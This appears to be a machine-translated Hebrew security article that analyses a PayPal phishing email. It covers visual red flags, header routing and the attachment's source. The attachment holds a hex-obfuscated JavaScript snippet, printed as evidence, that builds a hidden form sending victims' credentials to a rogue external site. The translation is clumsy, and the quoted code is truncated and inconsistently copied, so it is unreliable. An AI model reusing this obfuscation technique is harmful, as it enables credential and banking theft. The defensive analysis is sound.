אבטחה באינטרנט שוברים את האנטומיה של דואל התחזות
בעולם של היום שבו המידע של כולם הוא מקוון, התחזות היא אחת ההתקפות המקוונות הפופולרית ביותר, כי אתה תמיד יכול לנקות וירוס, אבל אם הפרטים הבנקאיים שלך נגנבו, אתה בצרות. הנה פירוט של התקפה כזו שקיבלנו.
אל תחשוב שזה רק הפרטים הבנקאיים שלך חשובים: אחרי הכל, אם מישהו מרוויח שליטה על הכניסה לחשבון שלך הם לא רק יודעים את המידע הכלול בחשבון זה, אבל הסיכויים הם כי פרטי כניסה זהה ניתן להשתמש על שונים אחרים חשבונות. ואם הם מתפשרים על חשבון הדוא"ל שלך, הם יכולים לאפס את כל הסיסמאות האחרות שלך.
אז בנוסף לשמירת סיסמאות חזקות ומשתנות, אתה צריך תמיד להיות על המשמר דוא"ל מזויף התחזות כמו הדבר האמיתי. בעוד שרוב ניסיונות התחזות הם חובבים, חלקם משכנעים למדי ולכן חשוב להבין כיצד לזהות אותם על פני השטח, כמו גם איך הם עובדים מתחת למכסה המנוע.
תמונה של asirap
בחינת מה נמצא במראה רגיל
הדוגמה של הדוא"ל שלנו, כמו רוב ניסיונות ההתחזות, "מודיעה" לך על הפעילות בחשבון PayPal שלך, אשר, בנסיבות רגילות, תהיה מדאיגה. אז קריאה לפעולה היא לאמת / לשחזר את החשבון שלך על ידי הגשת כמעט כל פיסת מידע אישי אתה יכול לחשוב. שוב, זה די נוסחלי.
אמנם יש בהחלט יוצאים מן הכלל, די הרבה כל פישינג דואר זבל הונאה נטען עם דגלים אדומים ישירות בהודעה עצמם. גם אם הטקסט הוא משכנע, אתה יכול בדרך כלל למצוא טעויות רבות littered ברחבי הגוף הודעה המציינים את ההודעה אינה לגיטימית.
גוף ההודעה
במבט ראשון, זהו אחד מכתבי ההתחזות הטובים יותר שראיתי. אין שגיאות כתיב או דקדוק, והקריאה נקראת בהתאם למה שניתן לצפות. עם זאת, ישנם כמה דגלים אדומים ניתן לראות כאשר אתה בוחן את התוכן קצת יותר מקרוב.
- "Paypal" - המקרה הנכון הוא "PayPal" (הון P). תוכל לראות שתי הווריאציות משמשות בהודעה. חברות מאוד מכוונת עם המיתוג שלהם, ולכן ספק אם משהו כזה יעבור את תהליך ההגהה.
- "אפשר ActiveX" - כמה פעמים ראית אינטרנט לגיטימי מבוסס העסק בגודל של Paypal להשתמש ברכוש קנייני אשר עובד רק על דפדפן אחד, במיוחד כאשר הם תומכים דפדפנים מרובים? בטח, איפשהו שם חברה עושה את זה, אבל זה דגל אדום.
- "הבטוחה." - שימו לב איך מילה זו לא בשורה בשוליים עם שאר הטקסט פסקה. גם אם אני מותח את החלון קצת יותר, זה לא לעטוף או שטח נכון.
- "Paypal!" - הרווח לפני סימן הקריאה נראה מביך. רק עוד quirk שבו אני בטוח לא יהיה דוא"ל לגיטימי.
- "PayPal - עדכון חשבון Form.pdf.htm" - מדוע PayPal לצרף "PDF" במיוחד כאשר הם יכולים רק קישור לדף באתר שלהם? בנוסף, מדוע ינסו להסוות קובץ HTML כקובץ PDF? זהו הדגל האדום הגדול מכולם.
כותרת ההודעה
כאשר תסתכל על כותרת ההודעה, יופיעו עוד כמה דגלים אדומים:
- הכתובת מהכתובת [email protected].
- הכתובת חסרה. אני לא ריק את זה, זה פשוט לא חלק הכותרת הראשית ההודעה. בדרך כלל חברה שיש לה את השם שלך יהיה אישית את הדוא"ל לך.
הקובץ המצורף
כאשר אני פותח את הקובץ המצורף, אתה יכול מיד לראות את הפריסה אינה נכונה כפי שהוא חסר מידע בסגנון. שוב, למה PayPal דוא"ל טופס HTML כאשר הם יכולים פשוט לתת לך קישור באתר שלהם?
הערה: השתמשנו ב- Gmail המובנה ב- HTML מצורף הצופה עבור זה, אבל אנחנו ממליצים לא לפתוח קבצים מצורפים מ scammers. לעולם לא. פעם. הם לעתים קרובות מכילים מנצל כי יתקין סוסים טרויאניים במחשב לגנוב את פרטי החשבון שלך.
גלילה למטה קצת יותר אתה יכול לראות כי טופס זה מבקש לא רק את פרטי הכניסה PayPal שלנו, אבל עבור הבנקאות ומידע כרטיס האשראי גם כן. חלק מהתמונות שבורות.
זה ברור כי זה התחזות הוא הולך אחרי הכל עם אחד.
התפלגות טכנית
אמנם זה צריך להיות די ברור על סמך מה שנראה לעין כי זה ניסיון התחזות, אנחנו הולכים עכשיו לשבור את האיפור הטכני של הדוא"ל ולראות מה אנחנו יכולים למצוא.
מידע מתוך הקובץ המצורף
הדבר הראשון הוא להסתכל על מקור ה- HTML של הטופס המצורף אשר הוא שולח את הנתונים לאתר מזויף.
כאשר צופה במהירות את המקור, כל הקישורים מופיעים תקף כפי שהם מצביעים על "paypal.com" או "paypalobjects.com" אשר שניהם לגיטימי.
עכשיו אנחנו הולכים להעיף מבט על כמה פרטים בסיסיים דף פיירפוקס אוספת בדף.
כפי שאתה יכול לראות, חלק הגרפיקה הם משכו מן התחומים "blessedtobe.com", "goodhealthpharmacy.com" ו "pic-upload.de" במקום תחומים PayPal לגיטימי.
מידע מכותרות הדוא"ל
הבא אנו נסתכל על כותרות הודעות דוא"ל גלם. Gmail הופך את זה לזמין באמצעות האפשרות Show Original בתפריט.
במבט על מידע הכותרת עבור ההודעה המקורית, אתה יכול לראות את ההודעה הזאת הולחנה באמצעות Outlook Express 6. אני בספק PayPal יש מישהו על צוות אשר שולח כל ההודעות הללו באופן ידני באמצעות לקוח הדוא"ל מיושן.
עכשיו מסתכל על מידע ניתוב, אנו יכולים לראות את כתובת ה- IP של השולח ואת שרת הדואר ממסר.
כתובת ה- IP של המשתמש היא השולח המקורי. ביצוע בדיקה מהירה על מידע ה- IP, אנו יכולים לראות את השולח IP הוא בגרמניה.
וכאשר אנו מסתכלים על שרת הדואר relaying (mail.itak.at), כתובת ה- IP אנו יכולים לראות זה ISP מבוסס באוסטריה. אני מסופקת PayPal מסלולים הדוא"ל שלהם ישירות דרך האינטרנט מבוסס ISP כאשר יש להם חוות שרת מסיבי אשר יכול בקלות להתמודד עם משימה זו.
לאן הנתונים הולכים?
אז קבענו בבירור שזה דוא"ל התחזות ואספנו מידע על מקור ההודעה, אבל מה לגבי הנתונים שלך שנשלחו?
כדי לראות זאת, עלינו תחילה לשמור את הקובץ המצורף HTM לעשות שולחן העבודה שלנו לפתוח בעורך טקסט. גלילה דרך זה, הכל נראה בסדר, אלא כאשר אנו מגיעים לחסום מבט חשוד Javascript.
פורץ את המקור המלא של הבלוק האחרון של Javascript, אנו רואים:
© זכויות יוצרים © 2005 Voormedia - WWW.VOORMEDIA.COM
var i, y, x =" 3c666f726d206e616d653d226d61696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e"; y ="; עבור (i = 0; i
בכל פעם שאתה רואה מחרוזת גדולה של מספרים ומספרים אקראיים לכאורה המוטבעים בבלוק Javascript, זה בדרך כלל משהו חשוד. כאשר מסתכלים על הקוד, המשתנה "x" מוגדר למחרוזת גדולה זו ולאחר מכן מפוענח למשתנה "y". התוצאה הסופית של המשתנה "y" נכתבת לאחר מכן למסמך כ- HTML.
מכיוון שהמחרוזת הגדולה מורכבת ממספרים 0-9 והאותיות a-f, סביר להניח שהיא מקודדת באמצעות המרה פשוטה של ASCII ל- Hex:
3c666f726d206e616d653d2267069696e222069643d226d61696e22206d6574686f643d22706f73742220616374696f6e3d22687474703a2f2f7777772e646578706f737572652e6e65742f6262732f646174612f7665726966792e706870223e
תורגם ל:
זה לא צירוף מקרים כי זה decodes לתוך תג HTML טופס תקף אשר שולח את התוצאות לא PayPal, אבל לאתר סוררים.
בנוסף, בעת הצגת מקור ה- HTML של הטופס, תראה שתג טופס זה אינו גלוי משום שהוא נוצר באופן דינמי דרך ה- Javascript. זוהי דרך חכמה להסתיר מה HTML עושה בפועל אם מישהו היה פשוט להציג את המקור שנוצר של הקובץ המצורף (כפי שעשינו קודם לכן) לעומת פתיחת הקובץ המצורף ישירות בעורך טקסט.
הפעלת whois מהירה על האתר הפוגע, אנו יכולים לראות את זה הוא תחום אירוח מתארח אינטרנט פופולרי, 1and1.
מה בולט הוא תחום משתמש שם קריא (בניגוד למשהו כמו "dfh3sjhskjhw.net") ואת התחום נרשם במשך 4 שנים. בגלל זה, אני מאמין שהדומיין הזה נחטף והשתמש בו כחייל בניסיון ההתנסות.
ציניות היא הגנה טובה
כשמדובר להישאר באינטרנט בטוח, זה לא כואב לקבל קצת ציניות.
אמנם אני בטוח שיש יותר דגלים אדומים בדוא"ל למשל, מה שהצגנו לעיל הם אינדיקטורים שראינו לאחר דקות ספורות של בדיקה. באופן היפותטי, אם רמת פני השטח של האימייל חיקתה את מקבילה הלגיטימי 100%, הניתוח הטכני עדיין יגלה את טבעו האמיתי. זה למה זה ייבוא כדי להיות מסוגל לבחון הן את מה שאתה יכול ולא יכול לראות.